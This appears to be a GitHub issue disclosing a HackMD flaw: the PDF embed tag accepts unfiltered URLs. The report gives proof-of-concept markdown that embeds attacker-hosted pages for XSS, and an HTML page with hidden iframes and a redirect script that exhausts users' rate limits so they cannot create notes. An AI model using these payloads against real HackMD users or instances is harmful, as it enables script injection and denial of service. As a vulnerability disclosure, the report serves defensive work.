Impropper url embed with PDF leading XSS and DoS

HackMD can iframe a pdf file through its url like this:  
```markdown
{%pdf https://example.com/meow.pdf%}
```
However, it doesn't filter the url well and it would lead to a XSS (though couldn't still cookie...)  
POC:  [https://hackmd.io/@Whale120/DEMO_XSS](https://hackmd.io/@Whale120/DEMO_XSS)
```markdown
# what happend anyway
{%pdf https://william957-web.github.io/meow_xss.html%}
```

What's more?  
Attack can construct a simple site like this:  
```html
<iframe width="1" height="1" frameborder="1" scrolling="no" vspace="1" hspace="1" marginheight="1" marginwidth="1" src="https://hackmd.io/new">a</iframe>
<iframe width="1" height="1" frameborder="1" scrolling="no" vspace="1" hspace="1" marginheight="1" marginwidth="1" src="https://hackmd.io/@Whale120/iframe_dos_demo">a</iframe>
<script>
  location.href="https://william957-web.github.io/meow_dos.html";
</script>
```

And iframe the attacker's site:  
PoC: [https://hackmd.io/@Whale120/iframe_dos_demo](https://hackmd.io/@Whale120/iframe_dos_demo)  
```markdown
{%pdf https://hackmd.io/@Whale120/iframe_dos_demo%}
{%pdf https://william957-web.github.io/meow_dos.html%}

# whale
The whale is the biggest creature under the sea.
Meowing whale, is that correct?
```
After a short period of time, users will be unable to add new articles (429 error).  
![image](https://github.com/user-attachments/assets/d24a435f-af98-4492-85a9-dc456a5391d3)  
![image](https://github.com/user-attachments/assets/43445376-bf01-419b-81ab-5e01340068ae)  



Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Impropper url embed with PDF leading XSS and DoS #1883

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Impropper url embed with PDF leading XSS and DoS #1883

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions